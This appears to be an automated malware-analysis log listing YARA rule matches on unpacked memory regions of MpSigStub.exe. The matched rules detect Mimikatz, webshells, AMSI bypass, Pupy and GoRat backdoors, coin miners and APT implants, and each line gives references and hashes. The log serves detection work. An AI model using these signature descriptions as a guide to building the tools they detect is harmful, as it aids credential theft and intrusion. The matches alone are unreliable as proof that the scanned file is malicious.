Source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a37e87d6.70.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3f2e43a.61.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a364dcf9.202.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a32a3acd.179.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a364dcf9.182.raw.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4a13be1.209.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a3f2fc42.62.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3f032fe.94.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a3929e2b.210.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3f032fe.94.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a359a55a.157.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a32a53a1.178.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3515a01.88.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a4a13be1.57.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4df1a99.144.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a3f84db6.208.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
